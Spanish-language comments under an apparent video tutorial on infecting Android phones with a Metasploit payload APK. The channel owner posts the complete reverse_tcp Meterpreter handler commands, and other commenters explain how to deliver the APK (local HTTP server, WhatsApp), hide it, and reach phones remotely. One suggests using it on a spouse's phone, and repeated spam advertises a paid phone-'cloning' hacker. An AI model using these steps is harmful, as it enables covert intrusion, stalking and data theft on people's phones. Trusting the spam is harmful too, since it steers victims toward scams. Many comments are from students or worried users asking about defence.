increible, haces que suene facil y de hecho terminas dandote cuenta de que si lo es, gracias por subir este video. me interesa mucho el area de ciberseguridad y esto ayuda un monton
amigo al instalar la app me sale que fue hecha para versiones anteriores de android y no me da el acceso en el kali puedes ayudarme su sabes que hacer?
Hace un par de meses nos dieron una pequeña introducción a kali en la universidad y me gustó lo poco que vimos, decidido a aprender un poco más me encontré este video y quedé satisfecho con la forma en que explica... hoy me quedó aqui y seguiré aprendiendo, saludos master!
Broo gran video.espero que este video pueda llegar a muchas personas, Lamentablemente muchas personas no saben que tan fácil pueden ser víctimas de hack , ya que muchos confían en técnicos donde llevan sus equipos a reparar y no sabemos que tipo de ética profesional tiene y le damos toda la fianza ( ojo no estoy generalizando)
Amigo una pregunta es posible que me puedan robar mis cuentas bancarias con mi número de celular? Necesitaba saber la ubicación de un ladrón y encontré a este hacker por quora, y me empezó cobrando 50 dólares y después 50. Y ahora me dice que falta más y que el a puesto la mayoría del dinero, lo hice por desesperación y ahora tengo miedo :(
@@eliezer.deleon oie tienes algún vídeo de como podemos asegurarnos los usuarios saber si estamos hackeados y una vez que ya estamos infectados cómo desinfectarnos? o solamente con eliminar la apk? se puede también en iOS?
Mi querido amigo hoy descubrí tu canal y este es el primer video que ví , la verdad que me encanto la forma en que lo explicas( de frente al grano) .quería preguntarle Cómo puedo estar en sus clases?
@@felipecastillo7898no, dice bien. Yo he estudiado minería y desarrollo web, pero un poco de curiosidad le haría bien si quiere llegar a algo. Si te has pasado 4 años bebiendo cerveza e intentando meterla...
Muy bueno este video bien echo, pero esto ya no funciona con los móviles de nueva generación y por correo olvidate de enviarlo ya que Gmail lo detecta como apk maliciosa, pero me encanta el vídeo.
Muchas gracias. Estoy empezando a estudiar el haking etico.. probe esta herramienta que ud. Enseña en el video en un entorno seguro con uno de mis celulares. Y en el ultimo paso cuando intento instalar el apk. En primer lugar la seguridad que trae mi dispositivo me advierte que estoy en presencia de un virus y en segundo lugar debo desactivar el google proctec para poder instalarlo.. luego que ignore todos esos pasos me sale un mensaje que me dice la apk fue creada para una version android anterior. Tengo un redmi 9. Gracias
Rexx_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria. Muchas gracias (Rexx_spycode).
Cuando pongo use exploit/multi/handler me dice “ command ‘use’ not found, did you mean:” y me da algunas opciones, soy principiante y queria saber si tengo que descargar algo para que active los comandos o que puedo hacer para que funcione?
aprendi mas viendo este video que dos semestres virtuales en mi universidad, hay alguna manera de tener los videos en mejor calidad, una que otra cosa no se podía identificar por ejemplo los comandos que tenia anotado
Creo que este video me servirá. Hace unos días, me hasaltaron, y me preocupa un poco lo que puedan hacer con mi celular, poque llevo información personal muy vulnerable...
Hola, al día de hoy lo he realizado en un androide 11 y me funciona, lo que más me costó fue anular las defensas del teléfono pero aunque me las marca como virus esta instalada y cada vez que la pulso se abre la sesión..
No... Esq el lo hace con su pc y el android conectado a la mism red local.. Instala el mismo la apk en el android victima y le salta que esa apk no es segura en el google protwct... Esto solo te sirve, por ejemplo, si quieres cceder al movil de tu esposa... Conectas todo a la wifi de tucasa... Instalas tu mismo el apk en dicho movil con un server apache por ejemplo o mas facil conectas el movil por usb a la pc.. O lo mandas por whatsapp.. Instalas tu mismo la apk en el movil y luego laconfig como oculta.. Pero en cuanto ese movil ya no este conectado a la wifi.. Ya no te vale pa naaaa....
excelente video como información educativo para estar al tanto de las cuestiones de seguridad .. lamentablemente . tengo conocido que fueron victimas de espionaje .... y nunca entendi como ingresaron en su celular ... gracias ...
Pregunta del millón, y si tarda 2 días , o 4 o 1 semana en ejecutarla? Como podría mantener esa sesion en Kali? No se perdería los datos guardados? Del nombre del programa etc etc?
hay una linea de codigo para mantener la sesion abierta cada vez que el celular de la victima o del atakante cada vez q apagas la consola o el android y tanto como la sesion o el dispositivo vuelvan a arrancar
No me cogió el comando Me salió error a qué se debe esto será Por el adaptador de la red? Lo tengo en adaptador puente Será por eso que no salieron bien los pasos
_Rex_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria. Muchas gracias (_Rex_spycode).
Los comandos del archivo que ejecutó no se miran bien,favor escribirlo y para próximo videos usar la herramienta de zoom,para ver mejor el área que explica, gracias
El video se ve interesante pero hay un detalle frente a ciertos puntos que vi, por lo menos algunos datos sensibles tratar de difuminarlos en caso un ejemplo que se encuentre el IMEI del teléfono para que alguien mas que vea el video no lo tome y registre ese IME en otro dispositivo. es uno de los detalles a considerar.
¿¿Cómo hago para reanudar el proceso de HACKING después de haber cerrado sesión o haber apagado mi MAQUINA VIRTUAL, teniendo obviamente la app ejecutada en el dispositivo VÍCTIMA?? Gracias cualquier información.
Hola un seguidor más igual estoy estudiando ing. En computación y me interesó mucho el vídeo Ya que planeaba presentarlo de forma educativa en mi universidad para el proyecto final Pero lo he echo y lo único que no he echo fue pasarlo por vía de cable si no que lo pase por vía WhatsApp No sé si eso tenga que ver en algo Yo sé tal vez no leea mi mensaje Pero si lo leee espero pueda ayudarme soy de México saludos Por cierto muy bien explicado sigue adelante ❤
monta un pequeño server con el comando paython3 -m http.server 80 En la carpeta donde tienes la apk y en el telefono victima entras al navegador y pones la ip de la maquina atacante y te debe de salir los archivos que están en esa carpeta
No sirve para Redmi10C comprobado :c, al ejecutar la app dice que se creó para una versión anterior de android y en el kali nunca llega la respuesta de conexión del cell, la versión de android es la 11
Le agrdeceria a la vida a ese obsesionado porq ya llevo varias clases que me interesban poco del tema, y no podia escuchar una clase, pero como ya se algo, me esta gustando 😅😂 y ya voy aprendiendo varias cosas🤭
Hice el testeo en mi teléfono para probar la vulnerabilidad del sistema, pero cuando abro a la aplicación en mi teléfono, no me aparece en la consola de Kali que esté en modo escucha
Muy interesante, pero muy limitado. Como sugerencia aprender a usar Kali Linux y algún lenguaje de programación como Python por ejemplo. Algo de lógica de programación para expander la imaginación.
Hola, buenas noches, consulta; tan solo sirve para dispositivos con Android 7 u 8 verdad? o puede funcionar en cualquier version?... En cualquier caso, es posible realizar un Payload en versiones superiores de android? Muy buena explicación. Un saludo desde Argentina.
excelente video, soy estudiante de ingeniería en sistemas y lo puse en practica solo que me da error en la versión del Android, perdona abra alguna opción para hacer con versiones de Android mas recientes. Gracias por compartir tus conocimientos.
Excelente demostración!, estoy iniciando con el estudio de esta materia (cyberseguridad), tengo la siguiente duda ¿Cómo enviar el payload, si sólo se cuenta con el número del móvil?
hola tengo un problema es que cuando yo llego al punto en el que ejecutamos el archivo de "comandos" y carga todo voy a mi celu y abro la aplicación no se muestra ningún mensaje ni accede al celu ayuda porfa
Una pregunta, como puedo defenderme de ese ataque si ya fui infectado y no le di cuenta (sin formatear el telefono) se puede uno defender de esos tipos de ataques o como podríamos saber que estamos infectados de ataques así. Muchas gracias y un muy buen video.
Me parece un buen video de enseñanza, hice todos los pasos e instalé la apk en el celular pero no me llegó a salir el "Sending Stage", alguien sabe porque? O que es lo que pude hacer mal?
admirable tu explicación todo bien detallado una pregunta solo se puede poner esa apk o puedes poner caulquiera? pregunto porque quiero aprender informatica o siberseguridad
hola buenas tardes, intenté realizar el procedimiento con mi dispositivo, pero me arroja un error porque la app es para versiones anteriores de android, hay alguna solución para ese problema?
Buen comienzo man, haceles a los pibes ,las exposiciones que te faltan.: -cambiar icono del APK -explayarte sobre las advertencias del antivirus del Android (instalacion de fuentes desconocidas) -posee persistencia ???? Trabajaste con Kali,pues el script viene bien,pero que onda con VIM , NANO,...y la instalacion de Kali en VIRTUALBOX y la misma VM.
Hola, buena tarde, muy buen video. Me gustaría practicar este método, ¿cómo podría saber los comandos que usted utiliza(no se alcanzan a ver los que tiene guardados en un documento)?
Hola, los comandos son los siguientes (De todos modos, los acabo de poner en la descripción del vídeo): use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.108 set LPORT 666 exploit
13:39 Despues de cd Desktop y ls, solo me aparece escrita "ModayBelleza" pero antes de esta no aparece escrito "comandos". Y cuando escribo "msfconsole -r comandos" aparece esto: Cannot find resource script: comandos msf6 > No hay tutoriales y como apenas estoy iniciando no se que hacer (pero bueno, ya me estaba emocionando porque según me iba a salir bien).
Ve a la pantalla principal o al escritorio crea un archivo nuevo, pon los comandos que estan en la descripcion, lo guardas y despues vuelves a poner el comando msfconsole y en teoria te deberia funcionar
Estoy ☝️ con el mayor respeto y amor por este tipo, que ha estado haciendo un buen trabajo constantemente, para las personas, protegiendo su identidad y trabajando a través de cualquier dispositivo, eres el mejor.
ESTA MUY INCOMPLETO, ESE SOLO ES SI ES LOCAL PERO SI ES UNA RED WAN, APARTE HABRIA QUE REVISAR SI MI MODEM ESTA HABIAERTO O DEFINIR EL PUERTO POR EL CUAL ACESAR
buenas explicacion vi este video por pura casualidad pero me gustaria saber si tendras una especia de curso para aprender el HACKING ETICO y hacerle las pruebas a mi router que acada rato le sacan la clave del wifi y eso que le he puesto de 20 caracteres incluyendo letras mayusculas minusculas numeros signos y asta espacios parase una direccion de un billetero de criptomonedas, tengo filtro mac y las ip bloqueadas y nada siempre tengo que estar cambiando claves y agregando las ip otra ves y me gustaria saber como segurisar mi router y yo mismo hacerle las pruebas de HACKING ETICO para descubrir por donde tengo las vulnerabilidades y cubrirlas espero tu respuesta mi pana saludos desde Venezuela... ya me suscribi + like + comprti tu video...
hola a todos los hacker presentes. tengo una pregunta, pero antes quiero ambientarlos así; ¿alguna vez han visto futbol en una tv y al momento del gol, los vecinos gritan gooollll primero? ósea, les llega la señal mucho mejor y más rápido y luego es que nosotros vemos el gol en nuestra pantalla jeje. y ya dicho esto, mi pregunta es, ¿será posible qué también pueda suceder con la señal de internet? es decir, alguien sabe como ralentizar la señal de internet 30 segundos a un minuto? para ver gráficos de trading sin que el gol no cambie. jeje espero me entiendan.
Sr. Carson, su buen trabajo y sinceridad nunca están en duda, gracias por exponer a amigos falsos que tenían malas intenciones hacia mí. Gracias por darme acceso a su cuenta🙌
perfecto. esta muy interesante y nada de complicación compañero pero una pregunta si de casualidad llegara a desinstalar la app se quitara esa vulnerabilidad??
Tengo una duda está forma de hacerlo funciona con teléfono a distancia que estén conectados a otra red wifi o red normal. O solo en equipos conectados a la misma red wifi
No... Pq no se establece la conexion.. Para que eso ocurra hay q saber un poco mas... Si desinstalas la app es como si cortaras el cable del telwfono fijo...
Rexx_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria. Muchas gracias (Rexx_spycode).
tengas unas preguntas: se puede ocultar la app una vez instalada? y una vez dentro de la victima al yo salirme de metasploit y después quiero volver a entrar a ese dispositivo como haría para volver a entrar?
increible, haces que suene facil y de hecho terminas dandote cuenta de que si lo es, gracias por subir este video. me interesa mucho el area de ciberseguridad y esto ayuda un monton
Cómo me encantaría estudiar con usted 🥺
Buena explicación, buena educación lo mejor 🙏
Esos 16 minutos pasaron volando y ni cuenta me di, buen video💪🏻👏🏻
Ahora mi Pregunta és Y si no Tienes El Telefono de lá Víctima Como Haces para enviarselo por correo eletrônico ?
profesor Eliezer, estoy terminando la carrera y una de las área que más me llama la atención es seguridad informática, muchas gracias por su aporte.
amigo al instalar la app me sale que fue hecha para versiones anteriores de android y no me da el acceso en el kali puedes ayudarme su sabes que hacer?
@@SamuGamingX bro por adonde mandaste el archivo?a mi no me deja xq lo detecta como un virus xd
@@Retranon tienes WhatsApp? Pa ser panas de hacking yo te ayudo
@@SamuGamingX X2
@@stussy1143 pasen WhatsApp para hacer un grupo y ayudarnos entre todos en este épico mundo del hack
Hace un par de meses nos dieron una pequeña introducción a kali en la universidad y me gustó lo poco que vimos, decidido a aprender un poco más me encontré este video y quedé satisfecho con la forma en que explica... hoy me quedó aqui y seguiré aprendiendo, saludos master!
dejamos de estar conectados al móvil en el momento en que la victima desinstala la app de ataque?? SALUDOS!
Broo gran video.espero que este video pueda llegar a muchas personas, Lamentablemente muchas personas no saben que tan fácil pueden ser víctimas de hack , ya que muchos confían en técnicos donde llevan sus equipos a reparar y no sabemos que tipo de ética profesional tiene y le damos toda la fianza ( ojo no estoy generalizando)
Este video es a nivel local. Solo en tu red
Amigo una pregunta es posible que me puedan robar mis cuentas bancarias con mi número de celular? Necesitaba saber la ubicación de un ladrón y encontré a este hacker por quora, y me empezó cobrando 50 dólares y después 50. Y ahora me dice que falta más y que el a puesto la mayoría del dinero, lo hice por desesperación y ahora tengo miedo :(
@@pablofernandoguangamarcill2094 D.e.p.
@@pablofernandoguangamarcill2094 aún necesitas ayuda?
@@pablofernandoguangamarcill2094 tienes que mostrarle las pruebas de que le pagaste todo
Por favor estoy haciendo una certificación en seguridad informática y me gustaría tener una lista de videos así de verdad eres un crack
Buena suerte en tu certificación💪
Lo mismo digo
Hola bro
Hola, estoy en el mismo proceso. Donde la estás haciendo?
@@eliezer.deleon oie tienes algún vídeo de como podemos asegurarnos los usuarios saber si estamos hackeados y una vez que ya estamos infectados cómo desinfectarnos? o solamente con eliminar la apk? se puede también en iOS?
Mi querido amigo hoy descubrí tu canal y este es el primer video que ví , la verdad que me encanto la forma en que lo explicas( de frente al grano) .quería preguntarle Cómo puedo estar en sus clases?
Voy a verlo , uno de los primeros, me gusta tu canal...más de estos vídeos...este tema es bueno....
Que alegria verte denuevo. Te seguia desde redes y binarios.
Me suscribo, estoy iniciando en el mundo de la ciberseguridad y el uso de Kali Linux, este video me ayudo a familiarizarme un poco más👏🏽👍🏽👍🏽💯
Man, ten por seguro que terminando de estudiar la carrera (dentro de 1 mes) me voy a ver todos los videos de tu canal. Rebuenísimos
Vas mas de 4 años en carrera y aun no sabes nada acerca de hacking?
Psdt. La pregunta es literal
@@stiprecjeijei tienes estar acostumbrado ese area no es facil, tienes que practicar todo los dias
@@stiprecjeijei Un poco soberbia tu manera de responder, quizás el enfoco sus conocimientos en otra área...
@@edsonarxx9047yo llevo 0 años de carrera y estoy acostumbrado, tan difícil no es. Igual para un pecio.
@@felipecastillo7898no, dice bien. Yo he estudiado minería y desarrollo web, pero un poco de curiosidad le haría bien si quiere llegar a algo. Si te has pasado 4 años bebiendo cerveza e intentando meterla...
Muy bueno este video bien echo, pero esto ya no funciona con los móviles de nueva generación y por correo olvidate de enviarlo ya que Gmail lo detecta como apk maliciosa, pero me encanta el vídeo.
Es lo que pensé algo viejo
cual recomiendas ahora
que opciones mas actualizadas hay?
Depende que es lo que quieres hacer todo eso se quedo antiguo
Creciste un montón amigo, me acuerdo cuándo veías tus primeros video que eran los de rangos de IPS y los tipos de IPS
apenas tengo 17 años y en toda mi vida siempre me gusto la informática y eh visto mucho tutoriales y puedo decir q este video se explica perfectamente
si omites las primeras 5 palabras estaria mejor tu comentario
Muchas gracias. Estoy empezando a estudiar el haking etico.. probe esta herramienta que ud. Enseña en el video en un entorno seguro con uno de mis celulares. Y en el ultimo paso cuando intento instalar el apk. En primer lugar la seguridad que trae mi dispositivo me advierte que estoy en presencia de un virus y en segundo lugar debo desactivar el google proctec para poder instalarlo.. luego que ignore todos esos pasos me sale un mensaje que me dice la apk fue creada para una version android anterior. Tengo un redmi 9. Gracias
Rexx_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria.
Muchas gracias (Rexx_spycode).
él está en IG con 2k seguidores y 1
siguiendo.
Es interesante verlo
Sobre todo si estas viendo para seguridad informática te da otra perspectiva
Buena explicacion hace un año yo intente eso ya entendi el unico chin que me faltaba 💯🤙🏻
Cuando pongo use exploit/multi/handler me dice “ command ‘use’ not found, did you mean:” y me da algunas opciones, soy principiante y queria saber si tengo que descargar algo para que active los comandos o que puedo hacer para que funcione?
Hermano estamos pendiente de tu entrevista
aprendi mas viendo este video que dos semestres virtuales en mi universidad, hay alguna manera de tener los videos en mejor calidad, una que otra cosa no se podía identificar por ejemplo los comandos que tenia anotado
En youtube te vuelves pirata
Es genial tu clase algo basico pero igual sirve para el manejo y cuidado de ciberseguridad
muchas gracias por este video educativo, me sirve mucho para mi curso completo de ciberseguridad.
Eres un grande ,sube mas contenido de hacking es muy interesante.
Es mero man que sirve para pruebas forenses ojalá se me facilite todo como lo dió a entender en el vídeo y no pase casi problemas
Creo que este video me servirá. Hace unos días, me hasaltaron, y me preocupa un poco lo que puedan hacer con mi celular, poque llevo información personal muy vulnerable...
jajajajjaa
Lo pondré a prueba , me lo aprenderé de izquierda a derecha , y responderé mi propio comentario de mi experiencia con lo que nos enseñas gracias
Y nunca aprendió
@@ruta4120 xd
Cómo te fue?
Lo hice y los comandos no funcionan
@@ruta4120no funcionó
Hola, al día de hoy lo he realizado en un androide 11 y me funciona, lo que más me costó fue anular las defensas del teléfono pero aunque me las marca como virus esta instalada y cada vez que la pulso se abre la sesión..
Se puede controlar un Android que no esté conectada a la misma ip de la PC de dónde se ataca?
Exelente es el primer video tullo q veo y me parece muy interesante, nuevo suscriptor
Hola, una pregunta hice todo el proceso tengo el archivo en mi dispositivo móvil pero no me deja abrirlo ni descargarlo como una aplicación apk
Excelente video. Kali linux es una buena herramienta para hacking.
Pero la parte mas importante es como enviar el paquete a la víctima, te la saltaste y ya está !!!! eres un mago ...
Mano a mí me sale que el APK no funcionó porque hay otra versión nueva.
No... Esq el lo hace con su pc y el android conectado a la mism red local.. Instala el mismo la apk en el android victima y le salta que esa apk no es segura en el google protwct... Esto solo te sirve, por ejemplo, si quieres cceder al movil de tu esposa... Conectas todo a la wifi de tucasa... Instalas tu mismo el apk en dicho movil con un server apache por ejemplo o mas facil conectas el movil por usb a la pc.. O lo mandas por whatsapp.. Instalas tu mismo la apk en el movil y luego laconfig como oculta.. Pero en cuanto ese movil ya no este conectado a la wifi.. Ya no te vale pa naaaa....
Interesante Eliezer, me gustaría ver más de este tipo de contenido. Saludos.
excelente video como información educativo para estar al tanto de las cuestiones de seguridad .. lamentablemente . tengo conocido que fueron victimas de espionaje .... y nunca entendi como ingresaron en su celular ... gracias ...
lo que se utiliza para realizar la conexión es la misma red?
ósea que no funcionaria de manera remota?
Para eso usa ngrok y s lhost y lport del serveo
Excelente este video le recomiendo a mejora la calidad de video
Muy bueno como para localizar nuestro dispositivo en casos de robos o pérdidas.
PRIMERA VEZ QUE VEO ESTOS TIPOS DE VIDEO DONDE ESTUDIASTE CAPO!
Pregunta del millón, y si tarda 2 días , o 4 o 1 semana en ejecutarla? Como podría mantener esa sesion en Kali? No se perdería los datos guardados? Del nombre del programa etc etc?
hay una linea de codigo para mantener la sesion abierta cada vez que el celular de la victima o del atakante cada vez q apagas la consola o el android y tanto como la sesion o el dispositivo vuelvan a arrancar
@@smoke4296 tu sabas cual es el codigo?
@@smoke4296 cuál es bro?
No me cogió el comando
Me salió error a qué se debe esto será
Por el adaptador de la red?
Lo tengo en adaptador puente
Será por eso que no salieron bien los pasos
2023 y sigue funcionando, un grande profesor, muchas gracias por su aporte :)
Cómo instalas la apk Ami no me deja
_Rex_spycode es un profesional de la clonación remota que trabaja con total seguridad donde él mismo ni siquiera necesita tener acceso al dispositivo a monitorear. Tu habilidad en operaciones remotas sin dejar rastros es simplemente extraordinaria.
Muchas gracias (_Rex_spycode).
él está en IG con 2k seguidores y 1
siguiendo.
Una pregunta.
En caso que de que se desinstale la aplicación, se pierde la comunicación?
Si, porque la aplicación es lo que transmite los datos a la maquina
Maestro muchas gracias por su demostración espero seguir aprendiendo de este mundo de la seguridad informática
Si vieron todo lo que puede hacer una aplicación cuando le damos permiso??? por eso hay que tener Mucho cuidado!!
Los comandos del archivo que ejecutó no se miran bien,favor escribirlo y para próximo videos usar la herramienta de zoom,para ver mejor el área que explica, gracias
El video se ve interesante pero hay un detalle frente a ciertos puntos que vi, por lo menos algunos datos sensibles tratar de difuminarlos en caso un ejemplo que se encuentre el IMEI del teléfono para que alguien mas que vea el video no lo tome y registre ese IME en otro dispositivo. es uno de los detalles a considerar.
¿¿Cómo hago para reanudar el proceso de HACKING después de haber cerrado sesión o haber apagado mi MAQUINA VIRTUAL, teniendo obviamente la app ejecutada en el dispositivo VÍCTIMA??
Gracias cualquier información.
Creo que si puedes mantener la Ip estatica, no habría ningun conflicto
Hola un seguidor más igual estoy estudiando ing. En computación y me interesó mucho el vídeo
Ya que planeaba presentarlo de forma educativa en mi universidad para el proyecto final
Pero lo he echo y lo único que no he echo fue pasarlo por vía de cable si no que lo pase por vía WhatsApp
No sé si eso tenga que ver en algo
Yo sé tal vez no leea mi mensaje
Pero si lo leee espero pueda ayudarme soy de México saludos
Por cierto muy bien explicado sigue adelante ❤
monta un pequeño server con el comando
paython3 -m http.server 80
En la carpeta donde tienes la apk
y en el telefono victima entras al navegador y pones la ip de la maquina atacante y te debe de salir los archivos que están en esa carpeta
No sirve para Redmi10C comprobado :c, al ejecutar la app dice que se creó para una versión anterior de android y en el kali nunca llega la respuesta de conexión del cell, la versión de android es la 11
Muy interesante. Podrías subir en texto los comandos que utilizas?. Pues no se ven muy nítidos en el vídeo.
Gracias
Hola, si. Los pondré en la descripción del vídeo tan pronto como sea posible.
@@eliezer.deleonte lo agradecería mucho
@@derik5047 sigo esperando.
@@eliezer.deleon subalo profe plis
Hola, aquí estan los comandos:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.108
set LPORT 666
exploit
Estoy estudiando informática estoy en 2 y pienso estudiar en la Universidad ciberseguridad con este video ya me decíci, buen video por cierto
Excelente vídeo educativo, se te agradece compartas tus conocimientos con la comunidad informática, saludos
Le agrdeceria a la vida a ese obsesionado porq ya llevo varias clases que me interesban poco del tema, y no podia escuchar una clase, pero como ya se algo, me esta gustando 😅😂 y ya voy aprendiendo varias cosas🤭
Las herramientas que utilizaste ya vienen instaladas en Kali o se tienen que instalar?
Ya vienen instaladas me parece, sino se instala metasploit framework
Hola, sería bueno que hicieras un pequeño curso sobre este tema.
Serie de hack ético! O no profe? Vamoooos!
Gracias a ti aprendi a subnetear :)
Excelente video... muy interesante el contenido, Muchas gracias!!! en STEAM hay contenido igual.
Una pregunta al momento de instalar el apk me dice que es para versiones viejas sabes a que se debe?
¿Lo solucionaste? Me pasa lo mismo
@@ElChe1 cualquier novedad avisar jajaj estoy igual
A q la policia no es tonta jajababa... Esto no vale...
me encanto! Te ganaste una suscripción:)
Hice el testeo en mi teléfono para probar la vulnerabilidad del sistema, pero cuando abro a la aplicación en mi teléfono, no me aparece en la consola de Kali que esté en modo escucha
Tienes que activar el modo escucha 😅 y podrás tener acceso ponga más atención
@user-ri2ev2hn1z a mi no me funciona ningún vídeo ya, no encuentro ninguno que funcione
Lo probe en mi cel y el apk es una version antigua y no me lo instala por ende en mi kali no registra ningun reverse.
Encontraste alguna forma de resolver eso? Me pasa lo mismo
@@merilynb.r.8764 Si pero no seas toxica, déjalo ir si te causa dudas xD
NO ESTÁ MUY NITIDO LOS COMANDOS, PUEDEN RESUBIR EL VIDEO?
EMPIEZA EN 03:40
Muy interesante, pero muy limitado. Como sugerencia aprender a usar Kali Linux y algún lenguaje de programación como Python por ejemplo. Algo de lógica de programación para expander la imaginación.
Hola, buenas noches, consulta; tan solo sirve para dispositivos con Android 7 u 8 verdad? o puede funcionar en cualquier version?... En cualquier caso, es posible realizar un Payload en versiones superiores de android? Muy buena explicación. Un saludo desde Argentina.
La versión del teléfono no importa
@@wandervalentin6303 si importa, no se instala en versiones de android recientes.
excelente video, soy estudiante de ingeniería en sistemas y lo puse en practica solo que me da error en la versión del Android, perdona abra alguna opción para hacer con versiones de Android mas recientes. Gracias por compartir tus conocimientos.
lo pudiste resolver me dice lo mismo
El APK generado por el Venom no es compatible con las versiones actuales de Android. 😒
que?
😂😂😂😂
Excelente demostración!, estoy iniciando con el estudio de esta materia (cyberseguridad), tengo la siguiente duda ¿Cómo enviar el payload, si sólo se cuenta con el número del móvil?
Para ejecutar ese ataque en mobil es bastante complejo hoy en dia, ya que la sesión se cierra muy rápido
a chumas
hola tengo un problema es que cuando yo llego al punto en el que ejecutamos el archivo de "comandos" y carga todo voy a mi celu y abro la aplicación no se muestra ningún mensaje ni accede al celu ayuda porfa
Una pregunta, como puedo defenderme de ese ataque si ya fui infectado y no le di cuenta (sin formatear el telefono) se puede uno defender de esos tipos de ataques o como podríamos saber que estamos infectados de ataques así. Muchas gracias y un muy buen video.
No instalar el apk qué te envié alguien desconocido por medio de alguna ruta de mensajería
Y si el afectado soy yo? Cómo me defiendo de eso? Eliminando la app es suficiente o q tengo q hacer?
Me parece un buen video de enseñanza, hice todos los pasos e instalé la apk en el celular pero no me llegó a salir el "Sending Stage", alguien sabe porque? O que es lo que pude hacer mal?
admirable tu explicación todo bien detallado
una pregunta solo se puede poner esa apk o puedes poner caulquiera?
pregunto porque quiero aprender informatica o siberseguridad
hola buenas tardes, intenté realizar el procedimiento con mi dispositivo, pero me arroja un error porque la app es para versiones anteriores de android, hay alguna solución para ese problema?
Buen comienzo man, haceles a los pibes ,las exposiciones que te faltan.:
-cambiar icono del APK
-explayarte sobre las advertencias del antivirus del Android (instalacion de fuentes desconocidas)
-posee persistencia ????
Trabajaste con Kali,pues el script viene bien,pero que onda con VIM , NANO,...y la instalacion de Kali en VIRTUALBOX y la misma VM.
Bro, sabes otras fuentes de información de hacking? Otros canales o paginas o cursos?
@@josedanielnovoa6284lo mismo quiero saber
Hola, buena tarde, muy buen video. Me gustaría practicar este método, ¿cómo podría saber los comandos que usted utiliza(no se alcanzan a ver los que tiene guardados en un documento)?
Hola, los comandos son los siguientes (De todos modos, los acabo de poner en la descripción del vídeo):
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.108
set LPORT 666
exploit
@@eliezer.deleon en la actulidad como mantienes la sesión activa, por que intente escalar privilegios como se hace en windows y no fue posible
@@eliezer.deleon disculpe usted me podria ayudar para recuperar my Facebook?
Alguien cambeo my contraseña
Kevin los comandos se te quedan guardados en la mente, cuando trabajas mucho con ellos es difícil olvidar
Me dice qué el commando exploit no existe😢 Como puedo arreglarlo?@@eliezer.deleon
13:39 Despues de cd Desktop y ls, solo me aparece escrita "ModayBelleza" pero antes de esta no aparece escrito "comandos".
Y cuando escribo "msfconsole -r comandos" aparece esto: Cannot find resource script: comandos
msf6 >
No hay tutoriales y como apenas estoy iniciando no se que hacer (pero bueno, ya me estaba emocionando porque según me iba a salir bien).
Ve a la pantalla principal o al escritorio crea un archivo nuevo, pon los comandos que estan en la descripcion, lo guardas y despues vuelves a poner el comando msfconsole y en teoria te deberia funcionar
Estoy ☝️ con el mayor respeto y amor por este tipo, que ha estado haciendo un buen trabajo constantemente, para las personas, protegiendo su identidad y trabajando a través de cualquier dispositivo, eres el mejor.
ESTA MUY INCOMPLETO, ESE SOLO ES SI ES LOCAL PERO SI ES UNA RED WAN, APARTE HABRIA QUE REVISAR SI MI MODEM ESTA HABIAERTO O DEFINIR EL PUERTO POR EL CUAL ACESAR
Es verdad que este tipo de "Hackeos" no funciona en Android muy recientes ?? Yo lo intente y solo funciono en teléfono con Android muy antiguo.
encontraste la forma de hacerlo con uno nuevo??
exacto el del video era 7.1 yo intente en uno 9+ y no quiere conectar
@@williamsalexander18 estamos en las mismas
buenas explicacion vi este video por pura casualidad pero me gustaria saber si tendras una especia de curso para aprender el HACKING ETICO y hacerle las pruebas a mi router que acada rato le sacan la clave del wifi y eso que le he puesto de 20 caracteres incluyendo letras mayusculas minusculas numeros signos y asta espacios parase una direccion de un billetero de criptomonedas, tengo filtro mac y las ip bloqueadas y nada siempre tengo que estar cambiando claves y agregando las ip otra ves y me gustaria saber como segurisar mi router y yo mismo hacerle las pruebas de HACKING ETICO para descubrir por donde tengo las vulnerabilidades y cubrirlas espero tu respuesta mi pana saludos desde Venezuela... ya me suscribi + like + comprti tu video...
Excelentísima explicación. Gracias por compartir y me suscribo a su canal. Saludes
Consejo 5: no tengas el móvil cerca si te vas a desnudar
Yo: veo el video mientras cago XDDD
XDDDDDDD 🤣🤣🤣
jajajja x2
hola a todos los hacker presentes. tengo una pregunta, pero antes quiero ambientarlos así; ¿alguna vez han visto futbol en una tv y al momento del gol, los vecinos gritan gooollll primero? ósea, les llega la señal mucho mejor y más rápido y luego es que nosotros vemos el gol en nuestra pantalla jeje. y ya dicho esto, mi pregunta es, ¿será posible qué también pueda suceder con la señal de internet? es decir, alguien sabe como ralentizar la señal de internet 30 segundos a un minuto? para ver gráficos de trading sin que el gol no cambie. jeje espero me entiendan.
Que pudiste aprender sobre eso??? Recomiendas algún documento o vídeo??? :o
Sr. Carson, su buen trabajo y sinceridad nunca están en duda, gracias por exponer a amigos falsos que tenían malas intenciones hacia mí. Gracias por darme acceso a su cuenta🙌
yo te digo a ti si cae presa🤣🤣🤣
Nel, da pruebas porque es todo en local
Toxica a la vista jajaja
tremendo video y muy bien explicado todo 🔥🔥🔥🔥
hola hermano cuando intalo la aplicacion el elcelular no pasa nada
dejamos de estar conectados al móvil en el momento en que la victima desinstala la app de ataque?? SALUDOS!
sip, si la desintala ya no tienes accesos
Amigo disculpa, para yo hacer eso que hiciste ¿que sistema debo tener en mi computadora? Sirve con windows 10?
perfecto. esta muy interesante y nada de complicación compañero pero una pregunta si de casualidad llegara a desinstalar la app se quitara esa vulnerabilidad??
Buenísima explicación amigo 👌
Tengo una duda está forma de hacerlo funciona con teléfono a distancia que estén conectados a otra red wifi o red normal. O solo en equipos conectados a la misma red wifi
Pregunta, si yo instalo una app como la del video y la desinstalo inmediatamente, igual me pueden hackear?
